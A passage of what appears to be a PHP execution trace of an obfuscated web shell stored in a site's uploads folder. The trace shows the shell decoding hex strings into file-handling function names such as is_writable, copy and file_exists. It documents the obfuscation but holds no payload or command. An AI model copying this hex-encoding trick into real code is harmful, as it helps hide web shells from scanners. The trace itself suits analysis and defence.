3 83 0 0.003464 480376 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 83 1 0.003475 480416
3 83 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 84 0 0.003503 480408 hexdec 0 /var/www/html/uploads/shell.php 27 1 '70'
3 84 1 0.003515 480456
3 84 R 112
3 85 0 0.003526 480376 chr 0 /var/www/html/uploads/shell.php 27 1 112
3 85 1 0.003537 480416
3 85 R 'p'
2 A /var/www/html/uploads/shell.php 27 $r .= 'p'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 86 0 0.003566 480408 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 86 1 0.003578 480456
3 86 R 108
3 87 0 0.003589 480376 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 87 1 0.003606 480416
3 87 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 88 0 0.003635 480416 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 88 1 0.003647 480464
3 88 R 105
3 89 0 0.003659 480384 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 89 1 0.003670 480424
3 89 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 90 0 0.003699 480416 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 90 1 0.003711 480464
3 90 R 116
3 91 0 0.003723 480384 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 91 1 0.003734 480424
3 91 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 71 1 0.003763 480384
2 71 R 'preg_split'
1 A /var/www/html/uploads/shell.php 8 $fc[4] = 'preg_split'
1 A /var/www/html/uploads/shell.php 7 $i++
2 92 0 0.003796 480384 nhx 1 /var/www/html/uploads/shell.php 8 1 '61727261795f64696666'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 19
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 93 0 0.003836 480416 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 93 1 0.003848 480464
3 93 R 97
3 94 0 0.003859 480384 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 94 1 0.003871 480424
3 94 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 95 0 0.003900 480448 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 95 1 0.003912 480496
3 95 R 114
3 96 0 0.003924 480416 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 96 1 0.003935 480456
3 96 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 97 0 0.003963 480448 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 97 1 0.003975 480496
3 97 R 114
3 98 0 0.003987 480416 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 98 1 0.003998 480456
3 98 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 99 0 0.004027 480448 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 99 1 0.004039 480496
3 99 R 97
3 100 0 0.004051 480416 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 100 1 0.004062 480456
3 100 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 101 0 0.004092 480448 hexdec 0 /var/www/html/uploads/shell.php 27 1 '79'
3 101 1 0.004103 480496
3 101 R 121
3 102 0 0.004115 480416 chr 0 /var/www/html/uploads/shell.php 27 1 121
3 102 1 0.004126 480456
3 102 R 'y'
2 A /var/www/html/uploads/shell.php 27 $r .= 'y'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 103 0 0.004193 480448 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 103 1 0.004206 480496
3 103 R 95
3 104 0 0.004219 480416 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 104 1 0.004230 480456
3 104 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 105 0 0.004259 480448 hexdec 0 /var/www/html/uploads/shell.php 27 1 '64'
3 105 1 0.004271 480496
3 105 R 100
3 106 0 0.004283 480416 chr 0 /var/www/html/uploads/shell.php 27 1 100
3 106 1 0.004294 480456
3 106 R 'd'
2 A /var/www/html/uploads/shell.php 27 $r .= 'd'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 107 0 0.004323 480448 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 107 1 0.004335 480496
3 107 R 105
3 108 0 0.004347 480416 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 108 1 0.004358 480456
3 108 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 109 0 0.004392 480456 hexdec 0 /var/www/html/uploads/shell.php 27 1 '66'
3 109 1 0.004403 480504
3 109 R 102
3 110 0 0.004416 480424 chr 0 /var/www/html/uploads/shell.php 27 1 102
3 110 1 0.004427 480464
3 110 R 'f'
2 A /var/www/html/uploads/shell.php 27 $r .= 'f'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 111 0 0.004456 480456 hexdec 0 /var/www/html/uploads/shell.php 27 1 '66'
3 111 1 0.004467 480504
3 111 R 102
3 112 0 0.004479 480424 chr 0 /var/www/html/uploads/shell.php 27 1 102
3 112 1 0.004490 480464
3 112 R 'f'
2 A /var/www/html/uploads/shell.php 27 $r .= 'f'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 92 1 0.004519 480424
2 92 R 'array_diff'
1 A /var/www/html/uploads/shell.php 8 $fc[5] = 'array_diff'
1 A /var/www/html/uploads/shell.php 7 $i++
2 113 0 0.004552 480424 nhx 1 /var/www/html/uploads/shell.php 8 1 '69735f646972'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 11
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 114 0 0.004592 480456 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 114 1 0.004604 480504
3 114 R 105
3 115 0 0.004616 480424 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 115 1 0.004627 480464
3 115 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 116 0 0.004656 480488 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 116 1 0.004668 480536
3 116 R 115
3 117 0 0.004681 480456 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 117 1 0.004692 480496
3 117 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 118 0 0.004722 480488 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 118 1 0.004733 480536
3 118 R 95
3 119 0 0.004745 480456 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 119 1 0.004756 480496
3 119 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 120 0 0.004786 480488 hexdec 0 /var/www/html/uploads/shell.php 27 1 '64'
3 120 1 0.004797 480536
3 120 R 100
3 121 0 0.004810 480456 chr 0 /var/www/html/uploads/shell.php 27 1 100
3 121 1 0.004821 480496
3 121 R 'd'
2 A /var/www/html/uploads/shell.php 27 $r .= 'd'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 122 0 0.004850 480488 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 122 1 0.004862 480536
3 122 R 105
3 123 0 0.004874 480456 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 123 1 0.004885 480496
3 123 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 124 0 0.004914 480488 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 124 1 0.004925 480536
3 124 R 114
3 125 0 0.004937 480456 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 125 1 0.004948 480496
3 125 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 113 1 0.004978 480456
2 113 R 'is_dir'
1 A /var/www/html/uploads/shell.php 8 $fc[6] = 'is_dir'
1 A /var/www/html/uploads/shell.php 7 $i++
2 126 0 0.005010 480456 nhx 1 /var/www/html/uploads/shell.php 8 1 '69735f66696c65'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 13
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 127 0 0.005050 480488 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 127 1 0.005061 480536
3 127 R 105
3 128 0 0.005074 480456 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 128 1 0.005088 480496
3 128 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 129 0 0.005119 480520 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 129 1 0.005131 480568
3 129 R 115
3 130 0 0.005143 480488 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 130 1 0.005154 480528
3 130 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 131 0 0.005184 480520 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 131 1 0.005196 480568
3 131 R 95
3 132 0 0.005208 480488 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 132 1 0.005220 480528
3 132 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 133 0 0.005250 480520 hexdec 0 /var/www/html/uploads/shell.php 27 1 '66'
3 133 1 0.005261 480568
3 133 R 102
3 134 0 0.005273 480488 chr 0 /var/www/html/uploads/shell.php 27 1 102
3 134 1 0.005284 480528
3 134 R 'f'
2 A /var/www/html/uploads/shell.php 27 $r .= 'f'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 135 0 0.005500 480520 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 135 1 0.005517 480568
3 135 R 105
3 136 0 0.005530 480488 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 136 1 0.005542 480528
3 136 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 137 0 0.005588 480520 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 137 1 0.005601 480568
3 137 R 108
3 138 0 0.005613 480488 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 138 1 0.005624 480528
3 138 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 139 0 0.005654 480520 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 139 1 0.005665 480568
3 139 R 101
3 140 0 0.005678 480488 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 140 1 0.005689 480528
3 140 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 126 1 0.005718 480488
2 126 R 'is_file'
1 A /var/www/html/uploads/shell.php 8 $fc[7] = 'is_file'
1 A /var/www/html/uploads/shell.php 7 $i++
2 141 0 0.005752 480488 nhx 1 /var/www/html/uploads/shell.php 8 1 '69735f7772697461626c65'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 21
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 142 0 0.005792 480520 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 142 1 0.005804 480568
3 142 R 105
3 143 0 0.005816 480488 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 143 1 0.005827 480528
3 143 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 144 0 0.005857 480552 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 144 1 0.005868 480600
3 144 R 115
3 145 0 0.005881 480520 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 145 1 0.005891 480560
3 145 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 146 0 0.005921 480552 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 146 1 0.005933 480600
3 146 R 95
3 147 0 0.005945 480520 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 147 1 0.005956 480560
3 147 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 148 0 0.005985 480552 hexdec 0 /var/www/html/uploads/shell.php 27 1 '77'
3 148 1 0.005997 480600
3 148 R 119
3 149 0 0.006009 480520 chr 0 /var/www/html/uploads/shell.php 27 1 119
3 149 1 0.006020 480560
3 149 R 'w'
2 A /var/www/html/uploads/shell.php 27 $r .= 'w'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 150 0 0.006054 480552 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 150 1 0.006066 480600
3 150 R 114
3 151 0 0.006079 480520 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 151 1 0.006089 480560
3 151 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 152 0 0.006118 480552 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 152 1 0.006130 480600
3 152 R 105
3 153 0 0.006142 480520 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 153 1 0.006153 480560
3 153 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 154 0 0.006183 480552 hexdec 0 /var/www/html/uploads/shell.php 27 1 '74'
3 154 1 0.006194 480600
3 154 R 116
3 155 0 0.006206 480520 chr 0 /var/www/html/uploads/shell.php 27 1 116
3 155 1 0.006217 480560
3 155 R 't'
2 A /var/www/html/uploads/shell.php 27 $r .= 't'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 156 0 0.006246 480552 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 156 1 0.006257 480600
3 156 R 97
3 157 0 0.006269 480520 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 157 1 0.006280 480560
3 157 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 158 0 0.006309 480560 hexdec 0 /var/www/html/uploads/shell.php 27 1 '62'
3 158 1 0.006321 480608
3 158 R 98
3 159 0 0.006332 480528 chr 0 /var/www/html/uploads/shell.php 27 1 98
3 159 1 0.006343 480568
3 159 R 'b'
2 A /var/www/html/uploads/shell.php 27 $r .= 'b'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 160 0 0.006372 480560 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 160 1 0.006383 480608
3 160 R 108
3 161 0 0.006396 480528 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 161 1 0.006407 480568
3 161 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 162 0 0.006436 480560 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 162 1 0.006447 480608
3 162 R 101
3 163 0 0.006459 480528 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 163 1 0.006470 480568
3 163 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 141 1 0.006499 480528
2 141 R 'is_writable'
1 A /var/www/html/uploads/shell.php 8 $fc[8] = 'is_writable'
1 A /var/www/html/uploads/shell.php 7 $i++
2 164 0 0.006532 480528 nhx 1 /var/www/html/uploads/shell.php 8 1 '69735f7265616461626c65'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 21
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 165 0 0.006572 480560 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 165 1 0.006584 480608
3 165 R 105
3 166 0 0.006596 480528 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 166 1 0.006607 480568
3 166 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 167 0 0.006636 480592 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 167 1 0.006647 480640
3 167 R 115
3 168 0 0.006659 480560 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 168 1 0.006670 480600
3 168 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 169 0 0.006699 480592 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 169 1 0.006711 480640
3 169 R 95
3 170 0 0.006723 480560 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 170 1 0.006734 480600
3 170 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 171 0 0.006767 480592 hexdec 0 /var/www/html/uploads/shell.php 27 1 '72'
3 171 1 0.006778 480640
3 171 R 114
3 172 0 0.006790 480560 chr 0 /var/www/html/uploads/shell.php 27 1 114
3 172 1 0.006801 480600
3 172 R 'r'
2 A /var/www/html/uploads/shell.php 27 $r .= 'r'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 173 0 0.006830 480592 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 173 1 0.006841 480640
3 173 R 101
3 174 0 0.006853 480560 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 174 1 0.006864 480600
3 174 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 175 0 0.006892 480592 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 175 1 0.006904 480640
3 175 R 97
3 176 0 0.006916 480560 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 176 1 0.006927 480600
3 176 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 177 0 0.006956 480592 hexdec 0 /var/www/html/uploads/shell.php 27 1 '64'
3 177 1 0.006967 480640
3 177 R 100
3 178 0 0.006979 480560 chr 0 /var/www/html/uploads/shell.php 27 1 100
3 178 1 0.006990 480600
3 178 R 'd'
2 A /var/www/html/uploads/shell.php 27 $r .= 'd'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 179 0 0.007019 480592 hexdec 0 /var/www/html/uploads/shell.php 27 1 '61'
3 179 1 0.007031 480640
3 179 R 97
3 180 0 0.007042 480560 chr 0 /var/www/html/uploads/shell.php 27 1 97
3 180 1 0.007054 480600
3 180 R 'a'
2 A /var/www/html/uploads/shell.php 27 $r .= 'a'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 181 0 0.007082 480600 hexdec 0 /var/www/html/uploads/shell.php 27 1 '62'
3 181 1 0.007093 480648
3 181 R 98
3 182 0 0.007105 480568 chr 0 /var/www/html/uploads/shell.php 27 1 98
3 182 1 0.007116 480608
3 182 R 'b'
2 A /var/www/html/uploads/shell.php 27 $r .= 'b'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 183 0 0.007145 480600 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 183 1 0.007156 480648
3 183 R 108
3 184 0 0.007168 480568 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 184 1 0.007179 480608
3 184 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 185 0 0.007208 480600 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 185 1 0.007220 480648
3 185 R 101
3 186 0 0.007232 480568 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 186 1 0.007251 480608
3 186 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 164 1 0.007280 480568
2 164 R 'is_readable'
1 A /var/www/html/uploads/shell.php 8 $fc[9] = 'is_readable'
1 A /var/www/html/uploads/shell.php 7 $i++
2 187 0 0.007316 480568 nhx 1 /var/www/html/uploads/shell.php 8 1 '66696c6573697a65'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 15
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 188 0 0.007357 480600 hexdec 0 /var/www/html/uploads/shell.php 27 1 '66'
3 188 1 0.007369 480648
3 188 R 102
3 189 0 0.007381 480568 chr 0 /var/www/html/uploads/shell.php 27 1 102
3 189 1 0.007392 480608
3 189 R 'f'
2 A /var/www/html/uploads/shell.php 27 $r .= 'f'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 190 0 0.007421 480632 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 190 1 0.007433 480680
3 190 R 105
3 191 0 0.007445 480600 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 191 1 0.007456 480640
3 191 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 192 0 0.007488 480632 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 192 1 0.007500 480680
3 192 R 108
3 193 0 0.007512 480600 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 193 1 0.007523 480640
3 193 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 194 0 0.007552 480632 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 194 1 0.007564 480680
3 194 R 101
3 195 0 0.007576 480600 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 195 1 0.007587 480640
3 195 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 196 0 0.007616 480632 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 196 1 0.007627 480680
3 196 R 115
3 197 0 0.007639 480600 chr 0 /var/www/html/uploads/shell.php 27 1 115
3 197 1 0.007650 480640
3 197 R 's'
2 A /var/www/html/uploads/shell.php 27 $r .= 's'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 198 0 0.007679 480632 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 198 1 0.007691 480680
3 198 R 105
3 199 0 0.007703 480600 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 199 1 0.007714 480640
3 199 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 200 0 0.007743 480632 hexdec 0 /var/www/html/uploads/shell.php 27 1 '7a'
3 200 1 0.007754 480680
3 200 R 122
3 201 0 0.007766 480600 chr 0 /var/www/html/uploads/shell.php 27 1 122
3 201 1 0.007777 480640
3 201 R 'z'
2 A /var/www/html/uploads/shell.php 27 $r .= 'z'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 202 0 0.007806 480632 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 202 1 0.007818 480680
3 202 R 101
3 203 0 0.007830 480600 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 203 1 0.007840 480640
3 203 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 187 1 0.007869 480608
2 187 R 'filesize'
1 A /var/www/html/uploads/shell.php 8 $fc[10] = 'filesize'
1 A /var/www/html/uploads/shell.php 7 $i++
2 204 0 0.007902 480608 nhx 1 /var/www/html/uploads/shell.php 8 1 '636f7079'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 7
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 205 0 0.007941 480640 hexdec 0 /var/www/html/uploads/shell.php 27 1 '63'
3 205 1 0.007953 480688
3 205 R 99
3 206 0 0.007965 480608 chr 0 /var/www/html/uploads/shell.php 27 1 99
3 206 1 0.007976 480648
3 206 R 'c'
2 A /var/www/html/uploads/shell.php 27 $r .= 'c'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 207 0 0.008006 480672 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6f'
3 207 1 0.008018 480720
3 207 R 111
3 208 0 0.008030 480640 chr 0 /var/www/html/uploads/shell.php 27 1 111
3 208 1 0.008041 480680
3 208 R 'o'
2 A /var/www/html/uploads/shell.php 27 $r .= 'o'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 209 0 0.008069 480672 hexdec 0 /var/www/html/uploads/shell.php 27 1 '70'
3 209 1 0.008081 480720
3 209 R 112
3 210 0 0.008093 480640 chr 0 /var/www/html/uploads/shell.php 27 1 112
3 210 1 0.008104 480680
3 210 R 'p'
2 A /var/www/html/uploads/shell.php 27 $r .= 'p'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 211 0 0.008133 480672 hexdec 0 /var/www/html/uploads/shell.php 27 1 '79'
3 211 1 0.008144 480720
3 211 R 121
3 212 0 0.008156 480640 chr 0 /var/www/html/uploads/shell.php 27 1 121
3 212 1 0.008167 480680
3 212 R 'y'
2 A /var/www/html/uploads/shell.php 27 $r .= 'y'
2 A /var/www/html/uploads/shell.php 26 $i += 2
2 204 1 0.008200 480640
2 204 R 'copy'
1 A /var/www/html/uploads/shell.php 8 $fc[11] = 'copy'
1 A /var/www/html/uploads/shell.php 7 $i++
2 213 0 0.008231 480640 nhx 1 /var/www/html/uploads/shell.php 8 1 '66696c655f657869737473'
2 A /var/www/html/uploads/shell.php 24 $r = ''
2 A /var/www/html/uploads/shell.php 25 $len = 21
2 A /var/www/html/uploads/shell.php 26 $i = 0
3 214 0 0.008271 480672 hexdec 0 /var/www/html/uploads/shell.php 27 1 '66'
3 214 1 0.008282 480720
3 214 R 102
3 215 0 0.008294 480640 chr 0 /var/www/html/uploads/shell.php 27 1 102
3 215 1 0.008305 480680
3 215 R 'f'
2 A /var/www/html/uploads/shell.php 27 $r .= 'f'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 216 0 0.008334 480704 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 216 1 0.008346 480752
3 216 R 105
3 217 0 0.008358 480672 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 217 1 0.008369 480712
3 217 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 218 0 0.008399 480704 hexdec 0 /var/www/html/uploads/shell.php 27 1 '6c'
3 218 1 0.008410 480752
3 218 R 108
3 219 0 0.008422 480672 chr 0 /var/www/html/uploads/shell.php 27 1 108
3 219 1 0.008433 480712
3 219 R 'l'
2 A /var/www/html/uploads/shell.php 27 $r .= 'l'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 220 0 0.008462 480704 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 220 1 0.008473 480752
3 220 R 101
3 221 0 0.008486 480672 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 221 1 0.008496 480712
3 221 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 222 0 0.008525 480704 hexdec 0 /var/www/html/uploads/shell.php 27 1 '5f'
3 222 1 0.008536 480752
3 222 R 95
3 223 0 0.008548 480672 chr 0 /var/www/html/uploads/shell.php 27 1 95
3 223 1 0.008559 480712
3 223 R '_'
2 A /var/www/html/uploads/shell.php 27 $r .= '_'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 224 0 0.008589 480704 hexdec 0 /var/www/html/uploads/shell.php 27 1 '65'
3 224 1 0.008600 480752
3 224 R 101
3 225 0 0.008612 480672 chr 0 /var/www/html/uploads/shell.php 27 1 101
3 225 1 0.008623 480712
3 225 R 'e'
2 A /var/www/html/uploads/shell.php 27 $r .= 'e'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 226 0 0.008651 480704 hexdec 0 /var/www/html/uploads/shell.php 27 1 '78'
3 226 1 0.008663 480752
3 226 R 120
3 227 0 0.008675 480672 chr 0 /var/www/html/uploads/shell.php 27 1 120
3 227 1 0.008686 480712
3 227 R 'x'
2 A /var/www/html/uploads/shell.php 27 $r .= 'x'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 228 0 0.008714 480704 hexdec 0 /var/www/html/uploads/shell.php 27 1 '69'
3 228 1 0.008726 480752
3 228 R 105
3 229 0 0.008738 480672 chr 0 /var/www/html/uploads/shell.php 27 1 105
3 229 1 0.008748 480712
3 229 R 'i'
2 A /var/www/html/uploads/shell.php 27 $r .= 'i'
2 A /var/www/html/uploads/shell.php 26 $i += 2
3 230 0 0.008777 480712 hexdec 0 /var/www/html/uploads/shell.php 27 1 '73'
3 230 1 0.008788 480760
3 230 R 115
